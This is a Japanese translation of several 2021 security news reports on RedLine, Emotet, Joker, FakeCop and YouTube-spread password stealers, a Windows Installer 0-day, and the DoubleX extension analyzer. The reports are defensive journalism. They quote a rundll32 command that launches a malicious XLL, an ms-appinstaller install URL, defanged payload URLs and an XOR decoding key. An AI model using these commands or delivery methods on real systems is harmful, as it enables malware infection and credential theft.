 ここ2週間に渡り、BleepingComputerのコンタクト フォームは様々なフィッシングの疑似餌で多大な回数スパムされた(インチキの広告リクエスト、クリスマスプレゼントの案内、Webサイト プロモーションを含む)。
 この疑似餌を研究したところ、BleepingComputerは、パブリックフォーラムや記事コメントシステムを使用している多くのWebサイトをターゲットにした広範なキャンペーンの存在を発見した。
 BleepingComputerが発見したフィッシングの疑似餌の中には、脅威のアクターがインチキのWebサイトを作成し、マルウェアをインストールするために使用される悪意あるExcel XLLファイルをホストしていた。
 例えば、或るキャンペーンは、以下のスパムメッセージと正当なPlutio(【訳注】フリーランサーや中小企業向けに設計されたオールインワンのビジネス管理プラットフォーム(Capterraより))のサイトを真似たインチキのWebサイトを使用していた。
 Everything you need to run your business.  Manage projects, create dazzling proposals and get paid faster. Black Friday! All plans are FREE, no credit card required.
 
 他のスパムメッセージは、支払い報告、広告の要求、以下に示したように、Google Drive上にホストされた悪意あるXLLファイルへのリンクが付属するギフトガイドであることを装っている。
 特段の興味を惹いたのは、サイトの所有者をターゲットにした疑似餌である。これはサイトの所有者に広告の掲載を要請し、オファーの条件を確認するよう依頼している。これはマルウェアをインストールする悪意ある
'terms.xll' ファイルを導入することになる。
 Sell us advertising space on your site from $ 500 
 今週BleepingComputerが発見した別の疑似餌は、
 Thanks for using our app. Your payment has been approved. You can see your payment report on the link below https://xxx[.]link/report.xll
 
 Google just revealed the 100 hottest gifts of 2021 
I won $10.000. Want it too? Read and accept the terms 
Excel XLLファイルの悪用 
 これらのスパムキャンペーンは、犠牲者のWindowsデバイスにRedLineマルウェアをダウンロードしインストールする悪意あるExcel XLLファイルを押し付けるように設計されている。
 XLLファイルは、開発者がデータの読み込み・書き込み、他のソースからのデータのインポート、様々なタスクを実行するためのカスタム機能を作成することでExcelの機能の拡張を可能にするアドインである。
 XLLファイルは単純なDLLファイルであり、そのアドインが起動された時に、Microsoft Excelによって実行される'xlAutoOpen'関数を含んでいる。
 
 BleepingComputerと
TheAnalyst (一緒にこの攻撃に関して論議しているセキュリティ研究者)とで実行したテストでは、このXLLファイルは正しくロードされなかったが、Microsoft Excelの他のバージョンでは動作するかもしれない。
 regsvr32.exeコマンドもしくは、
'rundll32 name.xll, xlAutoOpen' コマンドを手動で実行すると、 %UserProfile%フォルダにwget.exeプログラムを抽出する。このファイルは、リモートサイトからRedLineバイナリをダウンロードするために使用される。
 
 この悪意あるバイナリは、%UserProfile%\JavaBridge32.exe [
VirusTotal ] として保存され、実行される。
 レジストリのautorunエントリにも、犠牲者がWindowsにログインする度にRedLine情報窃盗マルウェアが自動的に起動するように作成される。
 
 このマルウェアが実行されると、盗む価値のあるデータ(Chrome, Edge, Firefox, Brave, Operaブラウザに格納されている認証とクレジットカードを含む)が検索される。
 あなたがこのキャンペーンの犠牲者になったのであれば、あなたが格納しているパスワードはセキュリティ侵害されていると思わなければならない、直ちにそれらを変更しなさい。更に、あなたがブラウザ中にクレジットカードを格納していたのであれば、あなたのクレジット会社にコンタクトし、この重大事案を注意喚起すべきである。
 XLLファイルは実行可能ファイルなので、脅威のアクターは、デバイス上で様々な悪意ある挙動を実行するためにXLLファイルを使用することができる。それ故、信頼されるソースからのものを除いて、XLLファイルを決して開いてはならない。
 これらのファイルは一般的に添付ファイルとして送信されることはないが、代わりに、他のプログラムやあなたのWindows管理者を介してインストールされる。
 それ故、この種のファイルを配布するeMailやメッセージを受け取った場合には、単純にそのメッセージを削除し、スパムとして報告しなさい。
Emotetは現在、インチキのAdobe Windows App Installerパッケージを介して拡散している 
 BleepingComputer : News>Security(2021/12/01) 
 Emotetマルウェアは現在、Adobe PDFを装う悪意あるWindows App Installer(アプリ インストーラ)を介して拡散している。
 Emotetは、フィッシングeMailや悪意ある添付ファイルを介して拡散している悪名高きマルウェア感染である。一旦インストールされると、このマルウェアは他のスパム キャンペーンのために犠牲者のeMailを盗み、一般的に身代金要求型攻撃を導くTrickBotやQbotのようなマルウェアを配備する。
 Emotetの背後にいる脅威のアクターは、Windows 10やWindows 11の組み込み機能であるApp Installerを使用して悪意あるパッケージをインストールすることでシステムに感染している。
 研究者達は今までに、Microsoft Azureでホストされている悪意のあるパッケージをインストールする
BazarLoaderマルウェアを配布する ために、これと同じ方法が使用されていたことを確認している。
Windows App Installerの悪用 
 Emotetトラッキンググループの
Cryptolaemus によって提供されたURLとeMailを使用して、BleepingComputerは、以下に示すように、この新しいeMailキャンペーンの攻撃フローをデモした。
 この新しいEmotetキャンペーンは、既存の通信に対する返信のように見せかける盗まれたリプライチェーンeMailで始まる。
 これらの返信は、単純に "Please see attached"(添付ファイルを確認してください)と受信者に告げている。そして、このeMail通信に関連付けられて述べられているPDFへのリンクを含んでいる。
 
 このリンクがクリックされると、ユーザはインチキのGoogle Driveページに連れて行かれ、PDFドキュメントを表示するためのボタンをクリックするように促される。
 
 この'Preview PDF'ボタンは、ms-appinstaller URLである。これは、*.web.core.windows.netのURLを使用しているMicrosoft Azureにホストされているappinstallerファイルを開こうとする。
 例えば、Adobeのリンクは、この例の URL: ms-appinstaller:?source=https://xxx.z13.web.core.windows.net/abcdefghi.appinstaller でappinstallerパッケージを開くだろう。
 appinstallerファイルは、単純なXMLファイルであり、署名した発行者に関する情報とインストールされるバンドルされているアプリケーションへのURLを含んでいる。
 
 .appinstallerファイルを開こうとすると、WindowsブラウザはWindows App Installerプログラムを開いて進行することを希望するか否かを確認してくる。
 同意すると、App Installerウィンドウは'Adobe PDF Component'をインストールすることを促してくる。
 
 この悪意あるパッケージは、正当なAdobe PDFアイコン、'Trusted App'としてマークされている有効な証明書、インチキの発行者情報が付いているので正当なAdobeアプリケーションのように見える。このWindowsからのこの種類の確認は、多くのユーザがそのアプリケーションを信頼しインストールするのに十分過ぎるものである。
 ユーザが'Install'ボタンをクリックすると、App Installerがダウンロードされ、Microsoft Azureにホストされている悪意あるappxbundleがインストールされる。このappxbundleは、%Temp%フォルダにDLLをインストールし、以下に示す rundll32.exe で、それを実行する。
 
 このプロセスは、ランダムに名前付けされたファイルとしてこのDLLをコピーし、以下に示すように、%LocalAppData%の下のフォルダにコピーされる。
 
 最後に、autrunは、ユーザがWindowsにログインした時に自動的にこのDLLが起動するように
HKCU\Software\Microsoft\Windows\CurrentVersion\Run を作成する。
 
 Emotetは、法執行機関がシャットダウンし、ボットネットのインフラを奪うまで、最も激しく拡散したマルウェアであった。10ヶ月後、Emotetは、TrickBotトロイの木馬の助けを得て再構築を開始し復活した。
 1日後、
Emotetスパムキャンペーン は、様々な誘惑とマルウェアをインストールする悪意あるドキュメントでユーザのメールボックスを攻撃するeMailで始まった。
 これらのキャンペーンにより、Emotetはその存在感を迅速に構築し、TrickBotとQbotをインストールする大規模なフィッシングキャンペーンを再度実行できるようになった。
 Emotetキャンペーンは通常、身代金要求型マルウェア攻撃につながる。 Windows管理者は、マルウェアが配布される方法を常に把握し、Emotetキャンペーンを見つけるように従業員をトレーニングする必要がある。 
脆弱性攻撃が公開されている新しいWindowsの0-Dayは管理者になることを可能にしている 
 BleepingComputer : News>Security(2021/11/22) 
 セキュリティ研究者は、Windows 10, Windows 11, Windows Serverにおいてローカル特権を管理者特権に昇格させる新しいWindowsの0-Dayを公開した。
 BleepingComputerは、この脆弱性攻撃をテストし、ローレベルの「標準」特権しか持たないアカウントからシステム特権付きのコマンドプロンプトを開くために使用した。
 この脆弱性を使用すると、セキュリティ侵害したデバイスに対して限定的なアクセスしか持たない脅威のアクターが、彼らの特権を簡単に昇格させることができ、ネットワーク中で水平方向に拡散する助けとなる。
 この脆弱性は、サポートされているWindowsの全てのバージョン(Windows 10, Windows 11, Windows Server 2022)に影響を与える。
研究者はパッチされた脆弱性に対するバイパスをリリース 
 2021年11月の定例パッチの一部として、Microsoftは、
CVE-2021-41379 として追跡される'Windows Installer Elevation of Privilege Vulnerability'(Windows インストーラーの特権の昇格の脆弱性)に関する脆弱性を修正した。
 この脆弱性は、セキュリティ研究者Abdelhamid Naceriによって発見された。彼は、Microsoftの修正を検証した後、このパッチはバイパスでき、より強力な新しい0-Dayの特権昇格の脆弱性を発見した。
 昨日、Naceriは、
GitHub 上にこの新しい0-Dayに関するproof-of-concept(概念の実証)を公開し、これがサポートされているWindowsの全てのバージョンで動作することを説明している。
 「この別形は、CVE-2021-41379パッチを解析している間に発見された。このバグは正しく修正されておらず、代わりにバイパスを投下している」と「私は、これがオリジナルの脆弱性よりももっと強力であるために、この別形を実際に投下することを選択した」と、彼の記事でNaceriは説明している。
 更に、Naceriは、「標準」ユーザをMSIインストーラの実行から妨げるためにグループポリシーを設定することは可能だが、彼の0-Dayは、このポリシーをバイパスし、ともかく機能すると説明している。
 BleepingComputerは、彼の'InstallerFileTakeOver'をテストした。結果、「標準」特権のテストアカウントからシステム特権を取得するまで僅か数秒であった。以下のビデオがデモンストレーションである。
 このテストは完全にアップデートされたWindows 10 21H1 build 19043.1348で実行された。
 BleepingComputerがNaceriに、この0-Dayを公開した理由を尋ねた時、彼は、MicrosoftのBug Bounty(脆弱性報奨金制度)の報奨金の減額に不満を持っていたためであると告げられた。
 「Microsoft報奨金は、2020年4月以来廃棄されている、Microsoftが、報奨金をダウングレードするような決定をしなかったなら、私はこのようなことをしなかっただろう」と、Naceriは説明している。
 研究者が報奨金の減額に感じている懸念はNaceri一人ではない。
  
  
 Microsoftは、この脆弱性が一般公開されたことを認識しているとBleepingComputerに告げている。
 「我々は、公開されたことに関して認識しており、顧客の安全と保護を維持するために必要なことを実行するだろう。説明されている方法を使用している攻撃者は、既にターゲットにした犠牲者のマシンに関するアクセスとコード実行の能力を既に取得しているに違いない」
 
 しかしながら、Naceriは、サードパーティのパッチ適用企業がバイナリにパッチを適用して、この脆弱性を修正しようとすることは、インストーラを壊す可能性があるため、推奨できないと警告している。
 「この記事を記述している時点で利用可能な最善の回避策は、この脆弱性が複雑であるために、Microsoftによるセキュリティパッチのリリースを待つことである」とNaceriは説明している。
 「バイナリに直接パッチを適用しようとする如何なる企ても、Windowsインストーラを破損させるだろう。そこで、待つことがより適切であり、Microsoftがパッチをどのように再度適用するのかを確認することである」 
新しいEmotetスパム キャンペーンは世界中のメールボックスを攻撃している 
 BleepingComputer : News>Security(2021/11/16) 
 
 Emotetマルウェアは昨日、10ヶ月に及ぶ複数のスパムキャンペーンの活動休止後、世界中のメールボックスに悪意あるドキュメントの配布を開始した。
 Emotetは、悪意ある添付ファイルによるスパムキャンペーンを介して拡散するスパム感染である。ユーザがこの添付ファイルを開くと、悪意あるマクロやJavaScriptが、Emotet DLLをダウンロードし、PowerShellを使用して、それをメモリにロードする。
 一旦ロードされると、このマルウェアは、将来のスパムキャンペーンに使用するためにeMailを探して盗み、一般的に身代金要求型マルウェアを導くTrickBotやQbotのような追加のペイロードを投下する。
再び開始されたEmotetスパム 
 昨夜、サイバーセキュリティ研究者Brad Duncanは、EmotetボットネットがEmotetマルウェアでデバイスに感染するために複数のeMailをスパミングするキャンペーンをどのように始めたかに関する
SANS Handler Diary を公開した。
 Duncanによると、このスパムキャンペーンは、受信者を誘惑し添付された悪意あるWord, Excel, パスワードで保護されたZIPファイルを開かせるためにリプレイチェーンeMailを使用している。
 リプレイチェーン フィッシングeMailは、今までに盗まれたeMailスレッドが、成り済ましの返信で使用され、他のユーザにマルウェアを拡散するものある。
 Duncanによって公開されたサンプルで、我々は「失くした財布」、CyberMondayセール(【訳注】 米国で感謝祭の次の月曜日から始まる大規模なオンラインショッピング上でのセール(Wikipediaより))、キャンセルされた会合、政治献金の推進、歯科保険の終了に関連するリプライチェーンが使用されていることを確認できる。
 これらのeMail添付ファイルは、以下に示すように、悪意あるマクロの付属したExcelやWordドキュメント、あるいは、悪意あるWordドキュメントを含むパスワードで保護されたZIPファイルである。
 
 
 
 現在、新しいEmotetスパムキャンペーンで拡散されている二つの異なる悪意あるドキュメントがある。
 一つ目は、このドキュメントはデスクトップもしくはラップトップのみで動作し、そのユーザがコンテンツを適切に閲覧するには「コンテンツの有効化」をクリックする必要があると述べているExcelドキュメント テンプレートである。
 
 
 悪意あるWord添付ファイルは、
'Red Dawn' テンプレートを使用しており、このドキュメントは"プロテクト"モードなので、正しく閲覧するには「コンテンツの有効化」と「編集を有効にする」を実行しなければならないと述べている。
 
 
Emotet添付ファイルはどのようにしてデバイスに感染するのか 
 Emotet添付ファイルを開くと、このドキュメント テンプレートは、プレビューが可能ではなく、コンテンツを適切に閲覧するには「編集を有効にする」と「コンテンツの有効化」をクリックする必要があると言ってくる。
 しかしながら、これらのボタンをクリックすると、悪意あるマクロが有効になり、PowerShellコマンドが起動し、セキュリティ侵害されたWordPressサイトからEmotetローダーDLLがダウンロードされ C:\ProgramData フォルダに保存される。
 
 ダウンロードされると、このDLLは、C:\Windows\SysWo64\rundll32.exe を使用して起動する。これは、%LocalAppData%にあるランダムなフォルダにこのDLLをコピーし、次に、そのフォルダからこのDLLを再起動する。
 その後、Emotetは、Windowsが起動した時にこのマルウェアが起動するように
HKCU\Software\Microsoft\Windows\CurrentVersion\Run の下にスタートアップ値を構築する。
 そのコマンドとコントロール サーバからコマンドが実行されるのを待っている間、Emotetマルウェアは、バックグラウンドで密かに稼働し続けている。
 これらのコマンドは、eMailを検索して盗んだり、他のコンピュータに拡散したり、あるいは、TrickBotやQbotトロイの木馬のような追加のペイロードをインストールしたりするためのものである。
 この時点で、BleepingComputerはEmotetによって投下される如何なる追加のペイロードも確認していない。これはDuncanのテストでも確認されている。
 「私は、私の最近のEmotet感染ホストからのスパムボットの挙動を確認しただけである」と「私は、今週Emotetが再構築されるものと考えている」と、DuncanはBleepingComputerに告げている。
 「おそらく、今後数週間幾つかの追加のマルウェア ペイロードを確認することになるだろう」と、この研究者は追加している。
Emotetに対する防御 
 マルウェアとボットネットモニタリング組織である
Abuse.ch は、コマンド&コントロールサーバとの相互通信を防ぐために境界ファイアーウォール(perimeter firewall)がブロックできる
245のコマンド&コントロールサーバのリスト をリリースした。
 C2との相互通信をブロックすることは、セキュリティ侵害されたデバイス上にEmotetが更なるペイロードを投下することを防ぐことでもある。
 国際法執行機関の作戦は、2021年1月に
Emotetボットネットを取り潰した 。その後10ヶ月間、このマルウェアは活動していなかった。
 しかしながら、日曜日の夜に開始された、アクティブなTrickBot感染が既に感染しているデバイスにEmotetローダーを投下することを開始し、スパム活動のためにボットネットが再構築された。
 Emotetの復活は全てのネットワーク管理者、セキュリティ専門家、Windows管理者が新たな開発を監視しなければならない重要なイベントである。
 過去、Emotetは
最も広く拡散しているマルウェア と考えられていた、そして、以前のランキングを取り戻す可能性が高い。 
悪意あるChrome拡張は悪。それなら、ハイジャックされる可能性のある無害なものはどうだろうか? それらの拡張にスポットを当てた新しいツールがある 
 The Register : Security(2021/11/11) 
 ドイツのCISPA Helmholtz Center for Information Securityのセキュリティ研究者は、悪意あるWebページや他の拡張によってセキュリティ侵害される脆弱性を持つChrome拡張の同定を支援するソフトウェアを開発した。
 2018年に戻る。Googleは彼らのブラウザ拡張プラットフォームをより安全にするために再設計する計画をアナウンスした。彼らの古いルール(Manifest v2として知られる)の下で、Chrome拡張は、簡単に誤用される可能性のある幅広い機能があった。
 そして、多くの悪漢共はこれらの機能を乱用した。例えば2020年2月、Googleは
500を超える悪意ある拡張を削除 した。これは、支払い詐欺と戦う新しい拡張のために、Googleが
Chrome Web Storeを閉じた 一ヶ月後であった。2020年の4月と5月には、更に多くの削除があった。この時は、
暗号通貨ウォレット認証を盗む ように設計された拡張関連であった。2020年6月と12月にもこのような事案があった。そして、この種のことは何年も続いている。
 Chrome Web Storeを綺麗にする努力に加えて、この3年の間に、GoogleはManifest v3を開発してきた。これはより制限した能力を提供する拡張APIセットの改訂版であり、コンテンツのブロックとプライバシーツールの犠牲の上に、セキュリティの危険性とプライバシーの潜在的危険性を向上させたものである。
 Googleは、2021年1月、再調査するためにManifest v3拡張の受け入れを開始した。それであるにも拘わらず、このより先進的な拡張にも脆弱性がないわけではなく、以前のManifest v2拡張は依然として出回っている。
 CISPA Helmholtz boffins Aurore FassのDoliere Francis Some, Michael Backes, Ben Stock(前二人の名前は、ウムラウトを省略しています)は、この状況に対処するための支援として
DoubleX と呼ばれるツールの開発に応じた。
 彼らは、その取り組みを"DoubleX: Statically Detecting Vulnerable Data Flows in Browser Extensions at Scale"と題した論文(
PDF )で説明している。これは、the Proceedings of the 2021 ACM SIGSAC Conference on Computer and Communications Security(来週、韓国で開催されるバーチャルイベント)に掲載された。
 悪意のある拡張は、セキュリティとプライバシーの懸念を示す拡張のほんの一部にすぎないと彼らは発言している。
 一方、無害な拡張機能には、ユーザーがインストールした他の拡張や、ユーザーによって訪問された悪意のあるWebページによって、実行すべきでない悪意あるスクリプトを実行したり、データを抽出したり、ダウンロードをトリガーする等に悪用される危険なコードを含んでいる可能性がある。DoubleXが探しているのは、これら無害ではあるが悪用可能な拡張である。
 DoubleXは、データフローの脆弱性にフラグを立てるように設計されたオープンソースの静的アナライザである。言い換えれば、悪意ある拡張を発見するためだけのものでなく、善意や無害のアドオンに存在する悪用可能なデータパスを探すものである。
 これらの欠陥はどのように悪用されるのか? この研究者達の説明によると、
eval関数 が含まれていることは、攻撃者が脆弱性のある拡張のパーミッションを潜在的に乗っ取ることができることを意味している。また、JavaScriptを挿入する
tabs.executeScript を含む拡張は、そのページ自体に脆弱性を与えることなく全てのWebページに任意のコードを実行する可能性を提供する。
・ Googleが以前の拡張の終了日を設定すると、Ad-Blockerの拡大が起こるのではないかということが懸念される。 広告ブロックブラウザ拡張は実際には広告を追加すると、Impervaの研究者達は発言している。 マズいことに、Chromeサミットで、開発者は、何故誰もがGoogleを使用する必要があるのか? と質問している。 ChromeがWebの機能を侵害し、Googleが誰かに伝えることを忘れた場合はどうなるのか? 待って、それは当に実際に発生していることである。 
 
 DoubleXに多数のChromeアプリケーションを食わせた時、実際に幾つかの問題が発見された。もっとも、Chrome Web Storeの栄光の歴史に期待する人は、おそらく一人未満であろうが。
 「我々は、154,484のChrome拡張を解析した。そのうちの278は外部からのデータ制御可能なデータフローを持っている、もしくは、重要なユーザ情報を抽出するものとしてフラグされた」と「このデータフローの89%が攻撃者によって影響を受けることが確認されている。これはDobuleXの正確性を際立たせている」と、この論文は述べている。
 「更に、我々の脅威モデルのもとで悪用可能(例えば、あらゆるWebサイトで任意のコード実行を導く)な184の拡張(209の脆弱性と共に)を検出した。」
 これら184の拡張(172の拡張は攻撃者の影響を受けやすく、12の拡張は特権を必要としない拡張を介して悪用可能)は、240万から290万ユーザに影響を与える。
 2020年10月から2021年5月まで、この科学者達は責任感から、連絡先情報が分かった場合には、彼らが発見したことを開発者に、それ以外の場合はGoogleに公開した。2021年7月、報告された脆弱性のある48の拡張のうち45が依然としてChrome Web Storeに存在していると主張している。
 「それらの中13は、公開されてからアップデートされたが、修正されたのは5つ(ユーザ数30万以上、ユーザ数3000以上、ユーザ数2000以上、ユーザ数35)に過ぎない」と、この論文は述べている。
注意: Google Play中のAndroidアプリケーションSmart TV remote'はマルウェアである 
 BleepingComputer : News>Security(2021/11/11) 
 Google Playストアで利用可能になっている二つのAndroidアプリケーションが今週、マルウェアを含んでいることが発見された。
 これらのアプリケーションは'Smart TV remote'と'Halloween Coloring'と呼ばれれいるアプリケーションであり、前者は少なくとも1000ダウンロードされている。
'Smart TV remote'アプリケーションは'Joker'マルウェアを同梱している 
 今週、KasperskyのAndroidマルウェア アナリストTatyana Shishkovaは、Jokerマルウェアを織り交ぜている二つのGoogle Playアプリケーションの名前を公開した。
 少なくともこれらのアプリケーションの一つである'Smart TV remote'は、10月29日の公開以来これまでに1000回以上インストールされている。
 Shishkovaによると、これらのアプリケーションはJokerマルウェアでトロイの木馬化されている。
 Tatyana ShishkovaのTwitter 
 
 BleepingComputerによって以前報道されたように、Jokerマルウェアの背後にいる脅威のアクターは、
無害のアプリケーションと見せかけるために悪意のあるコードを隠し 、公式のアプリケーションストアでこれらを公開している。今年始め、500,000を超えるHuawei AndroidデバイスがJokerに感染していることが発見された。
 このマルウェアは、ユーザの同意や認識なしにユーザをプレミアム モバイルサービスに申し込みすることで知られている。
難読化されたコードはELFを同梱しAPKをダウンロードする 
 悪意あるコードをより適切に解析するために、BleepingComputerはAndroidアプリケーションを入手し、これらのAPK(【訳注】Android Application Packageの略称。圧縮ファイルの一種でありその内部にはアプリがデバイスで正しくインストールされ起動するのに必要となるすべてのコンポーネントが保存されている(Malavidaより))を逆コンパイルした。
 また、Shishkovaによっても確認されたこととして、この悪意あるコードはSmart TV remoteアプリケーション中の"resources/assets/kup3x4nowz"ファイルに存在している。Halloween Coloringアプリケーションに関しては、同じファイルが、同じロケーションに存在し"q7y4prmugi"と名付けられている。
 このファイルはBase64コードを含み、以下に示すようにLinux 
ELF (【訳注】 Linux/UNIX プラットフォームにおいて、実行可能プログラムのために文書化されたファイル形式(Trendmicroより))バイナリを同梱している。
 
 このELFバイナリは更に、Amazon AWS(【訳注】 アマゾン ウェブ サービス、Amazonのクラウドコンピューティングサービスのこと(Amazonより))インスタンス上にホストされている第二段階のペイロードをダウンロードする。これらのURLは、以下に示す第二段階のペイロードをELF中に含んでいる。
Smart TV remote app: https://50egvllxk3.s3.eu-west-3.amazonaws[.]com/yr41ajkdp5 
 
 BleepingComputerによって確認されたこととして、それら自身を排他的論理和暗号化(XOR-encrypted)したこれらのファイル 
yr41ajkdp5  と 
vl39sbv02d  は、これまで主要なアンチウィルスエンジンをもってしても検出されていない。
 但し、XORキー'0x40'でこれらのファイルをデコードすると、APKアーカイブが生成される。本質的に擬似良性である
'Smart TV remote'と'Halloween Coloring'アプリケーションは、Androidデバイスに悪意あるコードをダウンロードするアプリケーションの代表である。
 先月、悪意ある"photo editor"アプリケーションが
Google Playストア上に存在している ことが、 ShishkovaとMaxime Ingrao(モバイル決済サイバーセキュリティ企業Evinaのセキュリティ研究者)によって発見された。
 BleepingComputerは、公開に先立ってGoogle Playに対して'Smart TV remote'と'Halloween Coloring'がマルウェアであると報告している。
 Google Play Protectは、Playストアへのアプリケーションの公開で最初に失敗しているにも拘わらず、まことしやかに、Google Play Protectは、最終的にこれらのアプリケーションを捕獲し、影響を受けるユーザに対して自動的な保護を提供する可能性があるらしい。
 「Google Play Protectはアプリケーションをインストールする時、それらをチェックする。また、定期的にあなたのデバイスをスキャンする。潜在的に有害なアプリケーションが発見された場合には、あなたに通知を送信する... あなたがそのアプリケーションをアンインストールするまで、そのアプリケーションは無効にされる、もしくは、自動的に削除される」とGoogleの
公式ドキュメント は述べている。
 それまでの間、これらのアプリケーションの何れかをインストールしたユーザは、直ちにこのアプリケーションをアンインストールし、スマートフォンをクリーンアップし、あらゆる不正な申込み、もしくは、それらのアカウントから発生している請求行為を確認する必要がある。
日本でAndroidスパイウェアがアンチウィルスソフトとして拡散している 
 BleepingComputer : News>Security(2021/10/28) 
 FakeCopと呼ばれるAndroid用の情報を盗み取るマルウェアの新しい変種が日本のセキュリティ研究者によって明らかにされた。この研究者は、悪意あるAPKの拡散が加速していると警告している。
 先週、日本のセキュリティ研究者
Yusuke Osumi によって最初に発見されたこのマルウェアは、KDDIを装うフィッシング キャンペーンで拡散している。
 更に、このマルウェアはVirusTotalの62のアンチウィルスエンジンの内22でしか検出されていない。これは隠されたままにする脅威のアクターによる一致協力の努力を示している。
 このマルウェアを発見したセキュリティ研究者の
Twitterへのリンク 
人気のあるセキュリティツールの仮面を被っている 
 サイバーセキュリティ企業Cybleによる新しいレポートに於いて、研究者達は、このマルウェアを'FakeCop'と名付けていた。このマルウェアが日本において人気のあるアンチウィルス'Anshin Security'(あんしんセキュリティ)を装っている。
 このマルウェアを解析した後、この研究者達は、この新しいスパイウェアの変種は以下の能力を持っていると述べている。
・ SMS(ショートメッセージサービス)、コンタクト、アカウント情報、アプリケーションリストを収集する 
 このスパイウェアは、以下に示したように、この機能を実行するために多数の重要なパーミッションを承認するようにユーザに要求する。
 
 ユーザがアンチウィルスソフトによってこのような要求に遭遇した時、彼らは、セキュリティソフトは一般的にスキャンし検出された脅威を削除するためにより高い権限を必要とするために、ほぼ間違いなくこのような要求を承認する。
検出の回避を企てている 
 このマルウェアの製作者は、静的検出を阻止しながら、彼らのアプリケーションの実際の挙動を隠蔽するために専用パッカーを使用している。
 この悪意あるコードは、暗号化されたビット排他的論理和であり、assetsフォルダ中のファイル内に格納されていて、特定のアプリケーション サブクラスによってコールされた場合にのみ解凍される。
 更に、FakeCopは積極的にデバイスアプリケーションリストをスキャンし、何らかのアンチウィルスを発見したなら、それらをアンインストールするようにユーザに通知する。
 このマルウェアがユーザに削除を促すためにハードコードされているアンチウィルス ソリューションは、Anshin Security、McAfee Security、Docomo Anshin Scanが含まれる。
 
 FakeCopが犠牲者に到達する方法に関して、CybleのOSINT(【訳注】オープン・ソース・インテリジェンス(open source intelligence)の略称。諜報活動の一種で、一般に公開され利用可能な情報を情報源に、機密情報等を収集する手法を指す(ニュートン・コンサルティングより))リサーチは、拡散の二つのチャンネルを明らかにした。一つは悪意あるリンクの付いたSMSであり、もう一つは、フィッシング メールに依存するものである。
 拡散メカニズムとして使用される'duckdns.org'フリー ダイナミックDNSは、MedusaやFlubotを拡散させるために
今まで使用されていた ので、現在のキャンペーンは同じオペレータの可能性がある。
 一般的なルールとして、求めていないSMSやeMailを介して届くURLリンクをクリックしないようにしなさい。また、Google Playストアの外部からAPK(Android application packageの略)ファイルをインストールすることは控えなさい。
 さらに、あなたのデバイス上でGoogle Playプロテクトがアクティブになっていることを定期的にチェックし確認し、新しいアプリをインストールするときには、常にパーミッション リクエストを精査しなさい。 
大規模なマルウェアキャンペーンがYouTubeを使用してパスワードを盗むマルウェアを押し付けようとしている 
 BleepingComputer : News>Security(2021/10/21) 
 広範なマルウェアキャンペーンがYouTubeビデオに作成され、疑うことを知らない閲覧者にパスワードを盗むトロイの木馬を配布している。
 パスワードを盗むトロイの木馬は、パスワード、アクティブウィンドウのスクリーンショット、クッキー、ブラウザに格納されているクレジットカード、FTP認証、脅威のアクターによって決定された任意のファイルを盗むために、コンピュータ上で静かに実行されるマルウェアである。
 インストールされると、このマルウェアはコマンド&コントロールサーバと双方向に通信する。コマンド&コントロールサーバとは、攻撃者によって、追加のマルウェアの実行を伴うコマンドが実行されることを待っている場所である。
悪意あるYouTubeビデオの狂乱 
 脅威のアクターは、ビデオ デスクリプションに埋め込んだリンクを介してマルウェアを拡散するための方法として
長きに渡りYouTubeビデオ を使用している。
 しかしながら今週、
Cluster25 のセキュリティ研究者
Frost は、YouTubeでパスワードを盗むトロイの木馬を押し付ける悪意あるキャンペーンが顕著な上昇を示しているとBleepingComputerに告げた。
 Frostは、これはおそらく、二つのマルウェアのクラスター(RedLineマルウェアと、もう一つはRacoon Stealerを押し付ける)が一斉に実行されたことによるとBleepingComputerに告げた。
 この研究者は、数千のビデオとチャンネルが、この大規模なマルウェアキャンペーンの一部(20分間に100の新しいビデオと81のチャンネルが作成されている)として実行されていると話している。
 Frostは、脅威のアクターは、エンドレスでずっと成長し続けるサイクルを作成するために、彼らが盗んだGoogleアカウントを使用して、マルウェアを拡散するために新しいYouTubeチャンネルを稼働していると説明している。
 「脅威のアクターは毎日新しいクライアントに感染しているので、数千の新しい利用可能なチャンネルを所有している。彼らは攻撃の一部として犠牲者のGoogle認証を盗む。そしてこれは次に、マルウェアを拡散するための新しいYouTubeビデオを作成するために使用される」と、FrostはBleepingComputerに説明している。
 この攻撃は、脅威のアクターが、ソフトウェアクラック、ライセンス、ハウツーガイド、暗号通貨、マイニング、ゲームチート(【訳注】ゲーム著作権の侵害行為)、VPNソフトウェア、他の多くの人気あるカテゴリに関するビデオで満たされた多数のYouTubeチャンネルを作成することで始まる。
 
 これらのビデオは特定のプログラムやユーティリティを使用してタスクを実行する方法の説明を含んでいる。更に、これらのYouTubeビデオのデスクリプションは、マルウェアを拡散するために使用される関連ツールへのリンクと主張されるものを含んでいる。
 
 ビデオにbit.ly(上図参照)リンクが含まれている場合には、パスワードを盗むRedLineマルウェア感染をホストしている別のファイル共有サイトに誘導する。しかしながら、それが短縮されていないドメインを含んでいる場合には、以下に示すように、Racoon Stealerを押し付けてくるtaplink[.]ccのページにリダイレクトされるだろう。
 
 一旦、ユーザが感染させられると、このマルウェアはインストールされている全てのブラウザと暗号通貨のウォレット、クレジットカード、パスワード、他のデータをスキャンすることを続行し、攻撃者にこのようなデータを返送する。
 Googleは、このキャンペーンを認識しており、この行為を粉砕するためのアクションをとっているとBleepingComputerに告げている。
 Googleは、このキャンペーンを認識しており、現在この脅威のアクターによる行為をブロックするアクションをとっており、Safe Browsing(【訳注】安全ではないウェブサイトを特定し、ユーザーやウェブサイトの所有者にその有害性を知らせる機能(Googleより))のために全てのリンクにフラグを立てている最中である。いつもどおり、我々は検出方法を改善し、このような脅威のリンクを自動的に同定し停止する新しいツールや機能に投資している。また、ユーザーが、このようなタイプの脅威を認識し、自分自身をさらに保護するために適切なアクションを実行することもまた重要である。-Google
 
 Googleはまた今週、YouTubeクリエイターの盗難アカウントを使用した
パスワードを盗むトロイの木馬を拡散させるフィッシングキャンペーン を公開している。これらのアカウントは次に、ダークWebマーケットで販売されたり、暗号通貨スカムを実行するために使用されている。
ソフトウェアのダウンロードは危険である 
 これらのキャンペーンは、YouTubeのようなサイトがビデオ発行者によって追加された全てのリンクを精査できるわけではないので、インターネットから手当たりしだいにプログラムをダウンロードしないことがいかに重要であるかを示している。
 それ故、ユーザは、そのサイトから何かをダウンロードしインストールする前にそのサイトを検証し、評判が良く信頼できるか否かを決定する必要がある。それでも、そのプログラムを実行しても安全か否かを確認するために、最初にVirusTotalのようなサイトに、そのプログラムをアップロードすることが常に提案されている。
